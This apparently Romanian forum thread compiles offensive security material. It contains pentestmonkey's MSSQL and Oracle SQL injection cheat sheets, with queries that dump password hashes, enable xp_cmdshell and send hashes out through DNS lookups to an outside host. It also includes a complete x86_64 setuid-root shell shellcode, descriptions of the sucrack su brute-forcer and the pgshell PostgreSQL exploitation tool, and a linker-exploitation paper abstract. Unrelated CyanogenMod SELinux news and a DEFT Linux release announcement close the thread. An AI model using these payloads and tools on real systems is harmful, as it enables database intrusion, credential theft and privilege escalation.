[h=1]MSSQL Injection Cheat Sheet[/h] Some useful syntax reminders for SQL Injection into MSSQL databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is: Oracle MSSQL MySQL PostgreSQL Ingres DB2 Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. [TABLE] [TR] [TD]Version[/TD] [TD]SELECT @@version[/TD] [/TR] [TR] [TD]Comments[/TD] [TD]SELECT 1 — comment SELECT /*comment*/1[/TD] [/TR] [TR] [TD]Current User[/TD] [TD]SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID[/TD] [/TR] [TR] [TD]List Users[/TD] [TD]SELECT name FROM master..syslogins[/TD] [/TR] [TR] [TD]List Password Hashes[/TD] [TD]SELECT name, password FROM master..sysxlogins — priv, mssql 2000; SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer. SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005; SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005[/TD] [/TR] [TR] [TD] Password Cracker[/TD] [TD]MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack these.[/TD] [/TR] [TR] [TD]List Privileges[/TD] [TD]– current privs on a particular object in 2005, 2008 SELECT permission_name FROM master..fn_my_permissions(null, ‘DATABASE’); — current database SELECT permission_name FROM master..fn_my_permissions(null, ‘SERVER’); — current server SELECT permission_name FROM master..fn_my_permissions(‘master..syslogins’, ‘OBJECT’); –permissions on a table SELECT permission_name FROM master..fn_my_permissions(‘sa’, ‘USER’); –permissions on a user– current privs in 2005, 2008 SELECT is_srvrolemember(‘sysadmin’); SELECT is_srvrolemember(‘dbcreator’); SELECT is_srvrolemember(‘bulkadmin’); SELECT is_srvrolemember(‘diskadmin’); SELECT is_srvrolemember(‘processadmin’); SELECT is_srvrolemember(‘serveradmin’); SELECT is_srvrolemember(‘setupadmin’); SELECT is_srvrolemember(‘securityadmin’); – who has a particular priv? 2005, 2008 SELECT name FROM master..syslogins WHERE denylogin = 0; SELECT name FROM master..syslogins WHERE hasaccess = 1; SELECT name FROM master..syslogins WHERE isntname = 0; SELECT name FROM master..syslogins WHERE isntgroup = 0; SELECT name FROM master..syslogins WHERE sysadmin = 1; SELECT name FROM master..syslogins WHERE securityadmin = 1; SELECT name FROM master..syslogins WHERE serveradmin = 1; SELECT name FROM master..syslogins WHERE setupadmin = 1; SELECT name FROM master..syslogins WHERE processadmin = 1; SELECT name FROM master..syslogins WHERE diskadmin = 1; SELECT name FROM master..syslogins WHERE dbcreator = 1; SELECT name FROM master..syslogins WHERE bulkadmin = 1; [/TD] [/TR] [TR] [TD]List DBA Accounts[/TD] [TD]SELECT is_srvrolemember(‘sysadmin’); — is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try ‘bulkadmin’, ‘systemadmin’ and other values from the documentation SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username. SELECT name FROM master..syslogins WHERE sysadmin = ’1? — tested on 2005[/TD] [/TR] [TR] [TD]Current Database[/TD] [TD]SELECT DB_NAME()[/TD] [/TR] [TR] [TD]List Databases[/TD] [TD]SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); — for N = 0, 1, 2, …[/TD] [/TR] [TR] [TD]List Columns[/TD] [TD]SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable[/TD] [/TR] [TR] [TD]List Tables[/TD] [TD]SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’; SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable[/TD] [/TR] [TR] [TD]Find Tables From Column Name[/TD] [TD]– NB: This example works only for the current database. If you wan’t to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects). SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’[/TD] [/TR] [TR] [TD]Select Nth Row[/TD] [TD]SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row[/TD] [/TR] [TR] [TD]Select Nth Char[/TD] [TD]SELECT substring(‘abcd’, 3, 1) — returns c[/TD] [/TR] [TR] [TD]Bitwise AND[/TD] [TD]SELECT 6 & 2 — returns 2 SELECT 6 & 1 — returns 0[/TD] [/TR] [TR] [TD]ASCII Value -> Char[/TD] [TD]SELECT char(0×41) — returns A[/TD] [/TR] [TR] [TD]Char -> ASCII Value[/TD] [TD]SELECT ascii(‘A’) – returns 65[/TD] [/TR] [TR] [TD]Casting[/TD] [TD]SELECT CAST(’1? as int); SELECT CAST(1 as char)[/TD] [/TR] [TR] [TD]String Concatenation[/TD] [TD]SELECT ‘A’ + ‘B’ – returns AB[/TD] [/TR] [TR] [TD]If Statement[/TD] [TD]IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1[/TD] [/TR] [TR] [TD]Case Statement[/TD] [TD]SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1[/TD] [/TR] [TR] [TD]Avoiding Quotes[/TD] [TD]SELECT char(65)+char(66) — returns AB[/TD] [/TR] [TR] [TD]Time Delay[/TD] [TD] WAITFOR DELAY ’0:0:5? — pause for 5 seconds[/TD] [/TR] [TR] [TD]Make DNS Requests[/TD] [TD]declare @host varchar(800); select @host = name FROM master..syslogins; exec(‘master..xp_getfiledetails ”\’ + @host + ‘c$boot.ini”’); — nonpriv, works on 2000declare @host varchar(800); select @host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) + ‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist ”\’ + @host + ‘c$boot.ini”’); — priv, works on 2005– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary. – Also check out theDNS tunnel feature of sqlninja[/TD] [/TR] [TR] [TD]Command Execution[/TD] [TD]EXEC xp_cmdshell ‘net user’; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default: EXEC sp_configure ‘show advanced options’, 1; — priv RECONFIGURE; — priv EXEC sp_configure ‘xp_cmdshell’, 1; — priv RECONFIGURE; — priv[/TD] [/TR] [TR] [TD]Local File Access[/TD] [TD]CREATE TABLE mydata (line varchar(8000)); BULK INSERT mydata FROM ‘c:boot.ini’; DROP TABLE mydata;[/TD] [/TR] [TR] [TD]Hostname, IP Address[/TD] [TD]SELECT HOST_NAME()[/TD] [/TR] [TR] [TD]Create Users[/TD] [TD]EXEC sp_addlogin ‘user’, ‘pass’; — priv[/TD] [/TR] [TR] [TD]Drop Users[/TD] [TD]EXEC sp_droplogin ‘user’; — priv[/TD] [/TR] [TR] [TD]Make User DBA[/TD] [TD]EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin; — priv[/TD] [/TR] [TR] [TD]Location of DB files[/TD] [TD]EXEC sp_helpdb master; –location of master.mdf EXEC sp_helpdb pubs; –location of pubs.mdf[/TD] [/TR] [TR] [TD]Default/System Databases[/TD] [TD]northwind model msdb pubs — not on sql server 2005 tempdb[/TD] [/TR] [/TABLE] [h=3]Misc Tips[/h] In no particular order, here are some suggestions from pentestmonkey readers. From Dan Crowley: A way to extract data via SQLi with a MySQL backend From Jeremy Bae: Tip about sp_helpdb – included in table above. From Trip: List DBAs (included in table above now): [INDENT]select name from master..syslogins where sysadmin = ’1? [/INDENT] From Daniele Costa: Tips on using fn_my_permissions in 2005, 2008 – included in table above. Also: To check permissions on multiple database you will have to use the following pattern. [INDENT]USE [DBNAME]; select permission_name FROM fn_my_permissions (NULL, ‘DATABASE’) [/INDENT] Note also that in case of using this data with a UNION query a collation error could occur. In this case a simple trick is to use the following syntax: [INDENT] select permission_name collate database_default FROM fn_my_permissions (NULL, ‘DATABASE’) [/INDENT] Sursa: MSSQL Injection Cheat Sheet | pentestmonkey

[h=1]Oracle SQL Injection Cheat Sheet[/h] Some useful syntax reminders for SQL Injection into Oracle databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is: Oracle MSSQL MySQL PostgreSQL Ingres DB2 Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. [TABLE] [TR] [TD]Version[/TD] [TD]SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance;[/TD] [/TR] [TR] [TD]Comments[/TD] [TD]SELECT 1 FROM dual — comment – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.[/TD] [/TR] [TR] [TD]Current User[/TD] [TD]SELECT user FROM dual[/TD] [/TR] [TR] [TD]List Users[/TD] [TD]SELECT username FROM all_users ORDER BY username; SELECT name FROM sys.user$; — priv[/TD] [/TR] [TR] [TD]List Password Hashes[/TD] [TD]SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked SELECT name,spare4 FROM sys.user$ — priv, 11g[/TD] [/TR] [TR] [TD] Password Cracker[/TD] [TD]checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.[/TD] [/TR] [TR] [TD]List Privileges[/TD] [TD]SELECT * FROM session_privs; — current privs SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;[/TD] [/TR] [TR] [TD]List DBA Accounts[/TD] [TD]SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles[/TD] [/TR] [TR] [TD]Current Database[/TD] [TD]SELECT global_name FROM global_name; SELECT name FROM v$database; SELECT instance_name FROM v$instance; SELECT SYS.DATABASE_NAME FROM DUAL;[/TD] [/TR] [TR] [TD]List Databases[/TD] [TD]SELECT DISTINCT owner FROM all_tables; — list schemas (one per user) – Also query TNS listener for other databases. See tnscmd (services | status).[/TD] [/TR] [TR] [TD]List Columns[/TD] [TD]SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’; SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;[/TD] [/TR] [TR] [TD]List Tables[/TD] [TD]SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables;[/TD] [/TR] [TR] [TD]Find Tables From Column Name[/TD] [TD]SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case[/TD] [/TR] [TR] [TD]Select Nth Row[/TD] [TD]SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)[/TD] [/TR] [TR] [TD]Select Nth Char[/TD] [TD]SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’[/TD] [/TR] [TR] [TD]Bitwise AND[/TD] [TD]SELECT bitand(6,2) FROM dual; — returns 2 SELECT bitand(6,1) FROM dual; — returns0[/TD] [/TR] [TR] [TD]ASCII Value -> Char[/TD] [TD]SELECT chr(65) FROM dual; — returns A[/TD] [/TR] [TR] [TD]Char -> ASCII Value[/TD] [TD]SELECT ascii(‘A’) FROM dual; — returns 65[/TD] [/TR] [TR] [TD]Casting[/TD] [TD]SELECT CAST(1 AS char) FROM dual; SELECT CAST(’1? AS int) FROM dual;[/TD] [/TR] [TR] [TD]String Concatenation[/TD] [TD]SELECT ‘A’ || ‘B’ FROM dual; — returns AB[/TD] [/TR] [TR] [TD]If Statement[/TD] [TD]BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements[/TD] [/TR] [TR] [TD]Case Statement[/TD] [TD]SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1 SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2[/TD] [/TR] [TR] [TD]Avoiding Quotes[/TD] [TD]SELECT chr(65) || chr(66) FROM dual; — returns AB[/TD] [/TR] [TR] [TD]Time Delay[/TD] [TD]BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT SELECT UTL_INADDR.get_host_name(’10.0.0.1?) FROM dual; — if reverse looks are slow SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow – Also see Heavy Queries to create a time delay[/TD] [/TR] [TR] [TD]Make DNS Requests[/TD] [TD]SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual; SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;[/TD] [/TR] [TR] [TD]Command Execution[/TD] [TD]Javacan be used to execute commands if it’s installed.ExtProc can sometimes be used too, though it normally failed for me. [/TD] [/TR] [TR] [TD]Local File Access[/TD] [TD]UTL_FILE can sometimes be used. Check that the following is non-null: SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used to read and write files if it’s installed (it is not available in Oracle Express).[/TD] [/TR] [TR] [TD]Hostname, IP Address[/TD] [TD]SELECT UTL_INADDR.get_host_name FROM dual; SELECT host_name FROM v$instance; SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address SELECT UTL_INADDR.get_host_name(’10.0.0.1?) FROM dual; — gets hostnames[/TD] [/TR] [TR] [TD]Location of DB files[/TD] [TD]SELECT name FROM V$DATAFILE;[/TD] [/TR] [TR] [TD]Default/System Databases[/TD] [TD]SYSTEM SYSAUX[/TD] [/TR] [/TABLE] [h=3]Misc Tips[/h] In no particular order, here are some suggestions from pentestmonkey readers. From Christian Mehlmauer: [TABLE] [TR] [TD]Get all tablenames in one string[/TD] [TD]select rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables – when using union based SQLI with only one row[/TD] [/TR] [TR] [TD]Blind SQLI in order by clause[/TD] [TD]order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end — you must know 2 column names with the same datatype[/TD] [/TR] [/TABLE] Sursa: Oracle SQL Injection Cheat Sheet | pentestmonkey

setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # * Neither the name of the Nth Dimension nor the names of its contributors may # be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # # (c) Tim Brown, 2009 # <mailto:timb@nth-dimension.org.uk> # <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/> # # setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux .text .globl _start _start: # uid = 0 xor %edi, %edi # set %edi to 0 # setuid mov $0x69, %al # set %al to 69 (setuid) syscall # enter the kernel # *filename = "/bin//sh" xor %ax, %ax # set %ax to 0 push %ax # push %ax on to the stack movq $0x68732f2f6e69622f, %rbx # set %rbx to "hs//nib/" pushq %rbx # push %rbx on to the stack movq %rsp, %rdi # set %rdi to %esp # **argv = [0, *filename] xorq %rcx, %rcx # set %rcx to 0 pushq %rcx # push %rcx on to the stack pushq %rdi # push %rdi on to the stack movq %rsp, %rsi # set %rsi to %rsp # execve mov $0x3b, %al # set %al to 59 (execve) syscall # enter the kernel L-am postat deoarece e explicat. Sursa: http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm

Breaking the links: Exploiting the linker Abstract The recent discussion relating to insecure library loading on the Microsoft Windows platform provoked a signicant amount of debate as to whether GNU/Linux and UNIX variants could be vulnerable to similar attacks. Whilst the general consensus of the Slashdot herd appeared to be that this was just another example of Microsoft doing things wrong, I felt this was unfair and responded with a blog post[1] that sought to highlight an example of where POSIX style linkers get things wrong. Based on the feedback I received to that post, I decided to investigate the issue a little further. This paper is an amalgamation of what I learnt. As such it contains my own research, the discoveries of others and POSIX lore. Contents 1 Technical Details 2 1.1 What is the linker? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.1.1 The link editor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.1.2 The runtime linker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.2 The linker attack surface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.2.1 The process of linking and executing . . . . . . . . . . . . . . . . . . . . . . . 2 1.2.2 Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 1.2.3 Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 1.2.4 issetugid() and friends . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 1.3 Real world exploitation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 1.3.1 The runtime linker as an interpreter . . . . . . . . . . . . . . . . . . . . . . . 6 1.3.2 The empty library . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 1.3.3 SIGSEGV'ing for 12 years . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 1.3.4 What's in your RPATH? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1.3.5 Debian makes me sad . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 1.3.6 If an environment variables is set but you don't trust it, is it still there? . . . 11 1.3.7 Re ections on Trusting Trust revisited . . . . . . . . . . . . . . . . . . . . . . 12 1.3.8 Mapping NULL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 1.4 Auditing scripts, binaries and source . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 1.4.1 Scripts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 1.4.2 Binaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 1.4.3 Source . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 1.5 Further research . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 1.5.1 Other linkers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 2 Changes 14 BTL.pdf (2547 downloads) © Tim Brown License: n/a Paper on exploiting linkers Download BTL.pdf Sursa: Nth Dimension/downloads:: Negatively discriminating against idiots since 1995!

sucrack is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su. This tool comes in handy as final instance on a system where you have not to many privileges but you are in the wheel group. Many su implementations require a pseudo terminal to be attached in order to take the password from the user. This is why you couldn't just use a simple shell script to do this work. This tool, written in c, is highly efficient and can attempt multiple logins at the same time. Please be advised that using this tool will take a lot of the CPU performance and fill up the logs quite quickly. sucrack is so far known to be running on FreeBSD, NetBSD, Linux Download [TABLE] [TR] [TD]sucrack-1.2.3.tar.gz[/TD] [TD]109 kb[/TD] [TD]README[/TD] [TD]ChangeLog[/TD] [/TR] [TR] [TD]sucrack-1.2.2.tar.gz[/TD] [TD]103 kb[/TD] [TD]README[/TD] [TD][/TD] [/TR] [/TABLE] Installation Default installation ./configure make make install You have two further compiling flags: Usage In order to run sucrack, you need to specify a wordlist: sucrack wordlist.txt Or advise it to read the passwords from stdin. In that case other tools with smart password generation algorithms could be easily used. For instance John The Ripper: john --stdout --incremental | sucrack - You generally will have two options for printing the progress and the statistics (if you have compiled sucrack with the `--enable-statistics' flag). Either by using ansi escapes codes, what makes it look nicer or without. The -a flag indicates, whether ansi escape codes should be used or not. Sursa si mai multe informatii: leidecker.info

A tool for exploiting SQL injections in PostgreSQL databases. Download [TABLE] [TR] [TD]pgshell[/TD] [/TR] [TR] [/TR] [TR] [TD]test-env.sh [/TD] [/TR] [/TABLE] Introduction The pgshell Perl script exploits configuration weaknesses in the PostgreSQL database management system as they were discribed in the corresponding paper (Having Fun With PostgreSQL). It not only allows to gather target system and user information but also privilege escalation, executing of shell commands and uploading of binary files. The general usage of pgshell could be outlined in three steps: gathering information creating the system and the upload framework launching a shell and uploading files The minimal parameters are the target host and a request file. The request file contains the HTTP request to send to the server plus a tag <<INJECTION>> that indicates, where to perform the SQL injection. A simple request file can look like this: GET /index.php?id=1;<<INJECTION>> HTTP/1.0 If not stated otherwise, every execution of pgshell reads from and writes to a session file. This way, informations won't get lost and the process can be resumed at any time. Additional there are certain settings that can be made in order to work properly against the target system. If you wish to launch a shell or to upload files you need to know the path to the libc. Furthermore, for uploading files, pgshell creates a function which uses the libc function open. Two parameters are needed in order to successfully open a file. These values are the OR'ed (O_CREAT | O_APPEND | O_RDWR) and S_IRWXU. Find out, what values those will be on your target system and put everything in an initial session file: =target.libc=/lib/libc.so.6 =target.flag.open=522 =target.flag.mode=448 Sursa si mai multe informatii: leidecker.info

[h=2]This Week In CyanogenMod[/h]July 19th, 2013 • Written by ciwrl Week Ending: July 19, 2013 – Special SELinux Edition “This Week in CyanogenMod” is an ongoing feature that aims to serve as a one-stop shop for weekly updates. Topics discussed are culled from our social media accounts, gerrit, status updates and general thoughts. This week was about all SELinux and adjusting our source to accommodate it. What is SELinux? The project’s official description reads “SELinux is a security enhancement to Linux which allows users and administrators more control over access control.” SELinux is a set of Open sourced and peer reviewed changes to the core Android Software stack to help prevent apps from performing malicious activities. This is done by establishing a set of policies that act as mandatory access controls (MAC). Depending on the policy, it can do things such as prevent apps from running or accessing specific data, to preventing root access altogether. SELinux has wide-scale adoption throughout the linux landscape, with Fedora, Red Hat and others incorporating policies to better the system security. The default policies are usually written per distribution, by their maintainers – we have begun this process for CyanogenMod. We will be working on this policy creation in parallel to Google’s own policies for Android, which we believe will be released with the Android 4.3 source; effectively getting us ahead of the eventual 4.3 source release. As this process is open source, policy creation and suggestions will be handled via our gerrit instance. What it’s not? SELinux is not a backdoor for government agencies to spy on you. It is not PRISM, PROMIS, CARNIVORE, The Great Firewall or any other ominous Big Brother-like initiative. Access Control Modes By default, we will be shipping with SELinux capabilities enabled in the kernel, but in a Permissive mode. What this means is that your phone will behave exactly as it currently does, with no noticeable change to the user. There are 3 modes in total, Enforcing, Permissive and Disabled. While in Enforcing mode, SELinux policies are enforced, preventing whatever causes a violation (ie su). Permissive mode logs policy violations, but does not prevent the activity that caused it. Disabled turns SELinux off. We are using Permissive mode as our default so we can come up with sensible policies. If you submit a log for us to analyze (via JIRA) for SELinux policy improvements, the logged exceptions will be of high value. This will be an ongoing process as we work to incorporate sensible policies for each device repo. As always our source is available on Github and patches will be peer reviewed via gerrit. For those more attuned to personal data security, you are welcome to watch and audit our efforts. For the rest of you, sit back and relax – no need for pitchforks. Sursa: This Week In CyanogenMod | CyanogenMod

Distribution Release: DEFT Linux 8 Stefano Fratepietro has announced the release of DEFT Linux 8, a Lubuntu-based distribution and live DVD featuring a collection of open-source tools for digital forensics and penetration testing: "Dear guys, we did our best to turn the DEFT 8 beta version into stable -- also by listening to your precious suggestions and feedback -- and here we are. You can download the DEFT 8 final stable ISO image (which now includes DART 2). The stable version has been checked against common bugs but we are human and pretty busy with our jobs so if we missed something, just drop a line to bug at deftlinux.net and we'll collect suggestions and bug fixes for the next release. A big thank to the DEFT team and to all the supporters. Stay tuned, because much more is yet to come, such as the release of the DEFT 8 virtual appliance (a pre-configured virtual machine you will be able to launch on your workstation by means of VMware Workstation or VMPlayer or Virtualbox); the DEFT 8 user manual; the updated website." Here is the brief release announcement. Download: deft8.iso (2,764MB, MD5). • 2013-07-20: Distribution Release: DEFT Linux 8 • 2013-07-01: Development Release: DEFT Linux 8 Beta • 2012-10-23: Distribution Release: DEFT Linux 7.2 • 2012-04-02: Distribution Release: DEFT Linux 7.1 • 2012-02-01: Distribution Release: DEFT Linux 7 • 2012-01-14: Development Release: DEFT Linux 7 RC1 Sursa: Distribution Release: DEFT Linux 8 (DistroWatch.com News)